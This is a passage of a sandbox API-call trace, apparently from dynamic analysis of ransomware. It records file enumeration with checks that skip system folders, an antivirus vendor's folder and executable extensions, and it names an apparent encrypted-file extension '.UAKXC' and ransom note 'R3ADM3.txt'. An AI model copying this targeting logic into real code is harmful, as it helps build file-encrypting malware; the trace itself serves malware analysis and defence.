(in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.763] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58b4ce70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0158.764] lstrcmpW (lpString1="BORDERS", lpString2=".") returned 1 [0158.764] lstrcmpW (lpString1="BORDERS", lpString2="..") returned 1 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="tmp") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="winnt") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="temp") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="thumb") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="$Recycle.Bin") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="System Volume Information") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="Boot") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="Windows") returned 0x0 [0158.764] StrStrIW (lpFirst="BORDERS", lpSrch="Trend Micro") returned 0x0 [0158.764] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.764] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.764] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.764] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.764] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.764] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e09f8 [0158.764] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32d40 [0158.764] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.764] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee75d00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd248dbc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1ee75d00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x2d998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BRTVIEW.DLL", cAlternateFileName="")) returned 1 [0158.764] lstrcmpW (lpString1="BRTVIEW.DLL", lpString2=".") returned 1 [0158.764] lstrcmpW (lpString1="BRTVIEW.DLL", lpString2="..") returned 1 [0158.764] StrStrIW (lpFirst="BRTVIEW.DLL", lpSrch=".UAKXC") returned 0x0 [0158.764] StrStrIW (lpFirst="BRTVIEW.DLL", lpSrch=".exe") returned 0x0 [0158.764] StrStrIW (lpFirst="BRTVIEW.DLL", lpSrch=".dll") returned=".DLL" [0158.765] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xcf8844c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xe7380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0158.765] lstrcmpW (lpString1="BSTORM.DLL", lpString2=".") returned 1 [0158.765] lstrcmpW (lpString1="BSTORM.DLL", lpString2="..") returned 1 [0158.765] StrStrIW (lpFirst="BSTORM.DLL", lpSrch=".UAKXC") returned 0x0 [0158.765] StrStrIW (lpFirst="BSTORM.DLL", lpSrch=".exe") returned 0x0 [0158.765] StrStrIW (lpFirst="BSTORM.DLL", lpSrch=".dll") returned=".DLL" [0158.765] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x500f7b00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd83c4bc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x500f7b00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x81d58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CDLMSO.DLL", cAlternateFileName="")) returned 1 [0158.765] lstrcmpW (lpString1="CDLMSO.DLL", lpString2=".") returned 1 [0158.765] lstrcmpW (lpString1="CDLMSO.DLL", lpString2="..") returned 1 [0158.765] StrStrIW (lpFirst="CDLMSO.DLL", lpSrch=".UAKXC") returned 0x0 [0158.765] StrStrIW (lpFirst="CDLMSO.DLL", lpSrch=".exe") returned 0x0 [0158.765] StrStrIW (lpFirst="CDLMSO.DLL", lpSrch=".dll") returned=".DLL" [0158.765] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x7b09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CGMIMP32.HLP", cAlternateFileName="")) returned 1 [0158.765] lstrcmpW (lpString1="CGMIMP32.HLP", lpString2=".") returned 1 [0158.765] lstrcmpW (lpString1="CGMIMP32.HLP", lpString2="..") returned 1 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".UAKXC") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".exe") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".dll") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".lnk") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".sys") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch=".msi") returned 0x0 [0158.765] StrStrIW (lpFirst="CGMIMP32.HLP", lpSrch="R3ADM3.txt") returned 0x0 [0158.765] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a20 [0158.765] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0a20 | out: hHeap=0xea0000) returned 1 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32db8 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a20 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32e30 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32db8 | out: hHeap=0xea0000) returned 1 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.766] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44f4800, ftCreationTime.dwHighDateTime=0x1c21319, ftLastAccessTime.dwLowDateTime=0x60382570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb44f4800, ftLastWriteTime.dwHighDateTime=0x1c21319, nFileSizeHigh=0x0, nFileSizeLow=0xdcc2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CharSetTable.chr", cAlternateFileName="CHARSE~1.CHR")) returned 1 [0158.766] lstrcmpW (lpString1="CharSetTable.chr", lpString2=".") returned 1 [0158.766] lstrcmpW (lpString1="CharSetTable.chr", lpString2="..") returned 1 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".UAKXC") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".exe") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".dll") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".lnk") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".sys") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch=".msi") returned 0x0 [0158.766] StrStrIW (lpFirst="CharSetTable.chr", lpSrch="R3ADM3.txt") returned 0x0 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0158.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a48 [0158.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddba8 [0158.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.767] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22bf4c00, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xcf0edea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x22bf4c00, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x41f78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CLVIEW.EXE", cAlternateFileName="")) returned 1 [0158.767] lstrcmpW (lpString1="CLVIEW.EXE", lpString2=".") returned 1 [0158.767] lstrcmpW (lpString1="CLVIEW.EXE", lpString2="..") returned 1 [0158.767] StrStrIW (lpFirst="CLVIEW.EXE", lpSrch=".UAKXC") returned 0x0 [0158.767] StrStrIW (lpFirst="CLVIEW.EXE", lpSrch=".exe") returned=".EXE" [0158.767] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2149b700, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd24d9e80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2149b700, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xb0578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CMAX20.DLL", cAlternateFileName="")) returned 1 [0158.767] lstrcmpW (lpString1="CMAX20.DLL", lpString2=".") returned 1 [0158.767] lstrcmpW (lpString1="CMAX20.DLL", lpString2="..") returned 1 [0158.767] StrStrIW (lpFirst="CMAX20.DLL", lpSrch=".UAKXC") returned 0x0 [0158.767] StrStrIW (lpFirst="CMAX20.DLL", lpSrch=".exe") returned 0x0 [0158.767] StrStrIW (lpFirst="CMAX20.DLL", lpSrch=".dll") returned=".DLL" [0158.767] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x37160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CNFNOT32.EXE", cAlternateFileName="")) returned 1 [0158.767] lstrcmpW (lpString1="CNFNOT32.EXE", lpString2=".") returned 1 [0158.767] lstrcmpW (lpString1="CNFNOT32.EXE", lpString2="..") returned 1 [0158.767] StrStrIW (lpFirst="CNFNOT32.EXE", lpSrch=".UAKXC") returned 0x0 [0158.767] StrStrIW (lpFirst="CNFNOT32.EXE", lpSrch=".exe") returned=".EXE" [0158.768] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd24fffe0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xcf88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CODEEDIT.DLL", cAlternateFileName="")) returned 1 [0158.768] lstrcmpW (lpString1="CODEEDIT.DLL", lpString2=".") returned 1 [0158.768] lstrcmpW (lpString1="CODEEDIT.DLL", lpString2="..") returned 1 [0158.768] StrStrIW (lpFirst="CODEEDIT.DLL", lpSrch=".UAKXC") returned 0x0 [0158.768] StrStrIW (lpFirst="CODEEDIT.DLL", lpSrch=".exe") returned 0x0 [0158.768] StrStrIW (lpFirst="CODEEDIT.DLL", lpSrch=".dll") returned=".DLL" [0158.768] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x337e5b00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0x6048cf10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x337e5b00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0x2cb78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0158.768] lstrcmpW (lpString1="CONTAB32.DLL", lpString2=".") returned 1 [0158.768] lstrcmpW (lpString1="CONTAB32.DLL", lpString2="..") returned 1 [0158.768] StrStrIW (lpFirst="CONTAB32.DLL", lpSrch=".UAKXC") returned 0x0 [0158.768] StrStrIW (lpFirst="CONTAB32.DLL", lpSrch=".exe") returned 0x0 [0158.768] StrStrIW (lpFirst="CONTAB32.DLL", lpSrch=".dll") returned=".DLL" [0158.768] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6471c400, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x604b3070, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6471c400, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x36580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContactPicker.dll", cAlternateFileName="CONTAC~1.DLL")) returned 1 [0158.768] lstrcmpW (lpString1="ContactPicker.dll", lpString2=".") returned 1 [0158.768] lstrcmpW (lpString1="ContactPicker.dll", lpString2="..") returned 1 [0158.768] StrStrIW (lpFirst="ContactPicker.dll", lpSrch=".UAKXC") returned 0x0 [0158.768] StrStrIW (lpFirst="ContactPicker.dll", lpSrch=".exe") returned 0x0 [0158.768] StrStrIW (lpFirst="ContactPicker.dll", lpSrch=".dll") returned=".dll" [0158.768] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff68b70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d547830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d547830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CONVERT", cAlternateFileName="")) returned 1 [0158.768] lstrcmpW (lpString1="CONVERT", lpString2=".") returned 1 [0158.768] lstrcmpW (lpString1="CONVERT", lpString2="..") returned 1 [0158.768] StrStrIW (lpFirst="CONVERT", lpSrch="tmp") returned 0x0 [0158.768] StrStrIW (lpFirst="CONVERT", lpSrch="winnt") returned 0x0 [0158.768] StrStrIW (lpFirst="CONVERT", lpSrch="temp") returned 0x0 [0158.768] StrStrIW (lpFirst="CONVERT", lpSrch="thumb") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="$Recycle.Bin") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="System Volume Information") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="Boot") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="Windows") returned 0x0 [0158.769] StrStrIW (lpFirst="CONVERT", lpSrch="Trend Micro") returned 0x0 [0158.769] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.769] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.769] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.769] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.769] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.769] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a70 [0158.769] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32db8 [0158.769] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.769] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a49800, ftCreationTime.dwHighDateTime=0x1cbae39, ftLastAccessTime.dwLowDateTime=0xa2045a20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x18a49800, ftLastWriteTime.dwHighDateTime=0x1cbae39, nFileSizeHigh=0x0, nFileSizeLow=0x911b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CSS7DATA0009.DLL", cAlternateFileName="CSS7DA~3.DLL")) returned 1 [0158.769] lstrcmpW (lpString1="CSS7DATA0009.DLL", lpString2=".") returned 1 [0158.769] lstrcmpW (lpString1="CSS7DATA0009.DLL", lpString2="..") returned 1 [0158.769] StrStrIW (lpFirst="CSS7DATA0009.DLL", lpSrch=".UAKXC") returned 0x0 [0158.769] StrStrIW (lpFirst="CSS7DATA0009.DLL", lpSrch=".exe") returned 0x0 [0158.769] StrStrIW (lpFirst="CSS7DATA0009.DLL", lpSrch=".dll") returned=".DLL" [0158.769] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d4df100, ftCreationTime.dwHighDateTime=0x1cba07f, ftLastAccessTime.dwLowDateTime=0xa6dee7e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3d4df100, ftLastWriteTime.dwHighDateTime=0x1cba07f, nFileSizeHigh=0x0, nFileSizeLow=0xbb1b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CSS7DATA000A.DLL", cAlternateFileName="CSS7DA~1.DLL")) returned 1 [0158.769] lstrcmpW (lpString1="CSS7DATA000A.DLL", lpString2=".") returned 1 [0158.769] lstrcmpW (lpString1="CSS7DATA000A.DLL", lpString2="..") returned 1 [0158.769] StrStrIW (lpFirst="CSS7DATA000A.DLL", lpSrch=".UAKXC") returned 0x0 [0158.769] StrStrIW (lpFirst="CSS7DATA000A.DLL", lpSrch=".exe") returned 0x0 [0158.769] StrStrIW (lpFirst="CSS7DATA000A.DLL", lpSrch=".dll") returned=".DLL" [0158.770] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64f18900, ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa408e480, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x64f18900, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0xbb1b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CSS7DATA000C.DLL", cAlternateFileName="CSS7DA~2.DLL")) returned 1 [0158.770] lstrcmpW (lpString1="CSS7DATA000C.DLL", lpString2=".") returned 1 [0158.770] lstrcmpW (lpString1="CSS7DATA000C.DLL", lpString2="..") returned 1 [0158.770] StrStrIW (lpFirst="CSS7DATA000C.DLL", lpSrch=".UAKXC") returned 0x0 [0158.770] StrStrIW (lpFirst="CSS7DATA000C.DLL", lpSrch=".exe") returned 0x0 [0158.770] StrStrIW (lpFirst="CSS7DATA000C.DLL", lpSrch=".dll") returned=".DLL" [0158.770] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ab7000, ftCreationTime.dwHighDateTime=0x1c8d9fe, ftLastAccessTime.dwLowDateTime=0x51d354f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9ab7000, ftLastWriteTime.dwHighDateTime=0x1c8d9fe, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Custom.propdesc", cAlternateFileName="CUSTOM~1.PRO")) returned 1 [0158.770] lstrcmpW (lpString1="Custom.propdesc", lpString2=".") returned 1 [0158.770] lstrcmpW (lpString1="Custom.propdesc", lpString2="..") returned 1 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".UAKXC") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".exe") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".dll") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".lnk") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".sys") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch=".msi") returned 0x0 [0158.770] StrStrIW (lpFirst="Custom.propdesc", lpSrch="R3ADM3.txt") returned 0x0 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a98 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.770] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.770] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.770] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0a98 | out: hHeap=0xea0000) returned 1 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0a98 [0158.770] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddc30 [0158.771] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.771] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.771] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b53d600, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd25e4820, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1b53d600, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x91170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DATAGATH.DLL", cAlternateFileName="")) returned 1 [0158.771] lstrcmpW (lpString1="DATAGATH.DLL", lpString2=".") returned 1 [0158.771] lstrcmpW (lpString1="DATAGATH.DLL", lpString2="..") returned 1 [0158.771] StrStrIW (lpFirst="DATAGATH.DLL", lpSrch=".UAKXC") returned 0x0 [0158.771] StrStrIW (lpFirst="DATAGATH.DLL", lpSrch=".exe") returned 0x0 [0158.771] StrStrIW (lpFirst="DATAGATH.DLL", lpSrch=".dll") returned=".DLL" [0158.771] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xcf942ba0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x124578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DBENGR.DLL", cAlternateFileName="")) returned 1 [0158.771] lstrcmpW (lpString1="DBENGR.DLL", lpString2=".") returned 1 [0158.771] lstrcmpW (lpString1="DBENGR.DLL", lpString2="..") returned 1 [0158.771] StrStrIW (lpFirst="DBENGR.DLL", lpSrch=".UAKXC") returned 0x0 [0158.771] StrStrIW (lpFirst="DBENGR.DLL", lpSrch=".exe") returned 0x0 [0158.771] StrStrIW (lpFirst="DBENGR.DLL", lpSrch=".dll") returned=".DLL" [0158.771] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, 